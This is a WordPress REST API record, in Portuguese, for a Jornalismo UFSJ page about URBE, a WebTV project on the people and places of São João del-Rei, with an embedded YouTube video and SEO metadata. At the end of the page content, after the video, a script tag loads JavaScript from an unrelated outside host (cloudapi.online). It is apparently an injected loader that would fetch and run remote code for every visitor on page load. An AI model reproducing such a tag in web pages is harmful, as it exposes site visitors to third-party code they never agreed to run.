{"id":2978,"date":"2016-05-03T14:17:43","date_gmt":"2016-05-03T14:17:43","guid":{"rendered":"http:\/\/jornalismo.ufsj.edu.br\/urbe-olhares-sobre-sao-joao\/"},"modified":"2017-09-07T15:28:44","modified_gmt":"2017-09-07T18:28:44","slug":"urbe-olhares-sobre-sao-joao","status":"publish","type":"page","link":"http:\/\/jornalismo.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/","title":{"rendered":"URBE &#8211; Olhares sobre S\u00e3o Jo\u00e3o"},"content":{"rendered":"<p>O projeto URBE \u2013 Olhares sobre S\u00e3o Jo\u00e3o, coordenado pelo professor Chico Brinati, conta a hist\u00f3ria de pessoas e lugares de S\u00e3o Jo\u00e3o del-Rei por meio de programas feitos na linguagem de WebTV.<\/p>\n<p>O prop\u00f3sito \u00e9 valorizar a diversidade da urbe sanjoanense, com seus tra\u00e7os e identidades.<\/p>\n<p>Confira todos os epis\u00f3dios j\u00e1 produzidos no <a href=\"https:\/\/www.youtube.com\/channel\/UCoTqPoFk2fjOKFF4tCgIqTg\">canal no youtube<\/a>.<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/Wj1UUxN4HP8?ecver=1\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>O projeto URBE \u2013 Olhares sobre S\u00e3o Jo\u00e3o, coordenado pelo professor Chico Brinati, conta a hist\u00f3ria de pessoas e lugares de S\u00e3o Jo\u00e3o del-Rei por meio de programas feitos na linguagem de WebTV. O prop\u00f3sito \u00e9 valorizar a diversidade da&#8230;<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>URBE - Olhares sobre S\u00e3o Jo\u00e3o - Jornalismo UFSJ<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/anu.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"URBE - Olhares sobre S\u00e3o Jo\u00e3o - Jornalismo UFSJ\" \/>\n<meta property=\"og:description\" content=\"O projeto URBE \u2013 Olhares sobre S\u00e3o Jo\u00e3o, coordenado pelo professor Chico Brinati, conta a hist\u00f3ria de pessoas e lugares de S\u00e3o Jo\u00e3o del-Rei por meio de programas feitos na linguagem de WebTV. O prop\u00f3sito \u00e9 valorizar a diversidade da...\" \/>\n<meta property=\"og:url\" content=\"http:\/\/anu.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/\" \/>\n<meta property=\"og:site_name\" content=\"Jornalismo UFSJ\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/jornalismoufsj\/\" \/>\n<meta property=\"article:modified_time\" content=\"2017-09-07T18:28:44+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@jornalismoufsj\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"http:\/\/anu.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/\",\"url\":\"http:\/\/anu.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/\",\"name\":\"URBE - Olhares sobre S\u00e3o Jo\u00e3o - Jornalismo UFSJ\",\"isPartOf\":{\"@id\":\"https:\/\/jornalismo.ufsj.edu.br\/site\/#website\"},\"datePublished\":\"2016-05-03T14:17:43+00:00\",\"dateModified\":\"2017-09-07T18:28:44+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/anu.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/anu.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/anu.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/jornalismo.ufsj.edu.br\/site\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"URBE &#8211; Olhares sobre S\u00e3o Jo\u00e3o\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/jornalismo.ufsj.edu.br\/site\/#website\",\"url\":\"https:\/\/jornalismo.ufsj.edu.br\/site\/\",\"name\":\"Jornalismo UFSJ\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/jornalismo.ufsj.edu.br\/site\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"URBE - Olhares sobre S\u00e3o Jo\u00e3o - Jornalismo UFSJ","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/anu.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/","og_locale":"pt_BR","og_type":"article","og_title":"URBE - Olhares sobre S\u00e3o Jo\u00e3o - Jornalismo UFSJ","og_description":"O projeto URBE \u2013 Olhares sobre S\u00e3o Jo\u00e3o, coordenado pelo professor Chico Brinati, conta a hist\u00f3ria de pessoas e lugares de S\u00e3o Jo\u00e3o del-Rei por meio de programas feitos na linguagem de WebTV. O prop\u00f3sito \u00e9 valorizar a diversidade da...","og_url":"http:\/\/anu.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/","og_site_name":"Jornalismo UFSJ","article_publisher":"https:\/\/www.facebook.com\/jornalismoufsj\/","article_modified_time":"2017-09-07T18:28:44+00:00","twitter_card":"summary_large_image","twitter_site":"@jornalismoufsj","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"http:\/\/anu.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/","url":"http:\/\/anu.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/","name":"URBE - Olhares sobre S\u00e3o Jo\u00e3o - Jornalismo UFSJ","isPartOf":{"@id":"https:\/\/jornalismo.ufsj.edu.br\/site\/#website"},"datePublished":"2016-05-03T14:17:43+00:00","dateModified":"2017-09-07T18:28:44+00:00","breadcrumb":{"@id":"http:\/\/anu.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["http:\/\/anu.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/anu.ufsj.edu.br\/site\/urbe-olhares-sobre-sao-joao\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/jornalismo.ufsj.edu.br\/site\/"},{"@type":"ListItem","position":2,"name":"URBE &#8211; Olhares sobre S\u00e3o Jo\u00e3o"}]},{"@type":"WebSite","@id":"https:\/\/jornalismo.ufsj.edu.br\/site\/#website","url":"https:\/\/jornalismo.ufsj.edu.br\/site\/","name":"Jornalismo UFSJ","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/jornalismo.ufsj.edu.br\/site\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"}]}},"_links":{"self":[{"href":"http:\/\/jornalismo.ufsj.edu.br\/site\/wp-json\/wp\/v2\/pages\/2978"}],"collection":[{"href":"http:\/\/jornalismo.ufsj.edu.br\/site\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/jornalismo.ufsj.edu.br\/site\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/jornalismo.ufsj.edu.br\/site\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/jornalismo.ufsj.edu.br\/site\/wp-json\/wp\/v2\/comments?post=2978"}],"version-history":[{"count":3,"href":"http:\/\/jornalismo.ufsj.edu.br\/site\/wp-json\/wp\/v2\/pages\/2978\/revisions"}],"predecessor-version":[{"id":6163,"href":"http:\/\/jornalismo.ufsj.edu.br\/site\/wp-json\/wp\/v2\/pages\/2978\/revisions\/6163"}],"wp:attachment":[{"href":"http:\/\/jornalismo.ufsj.edu.br\/site\/wp-json\/wp\/v2\/media?parent=2978"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}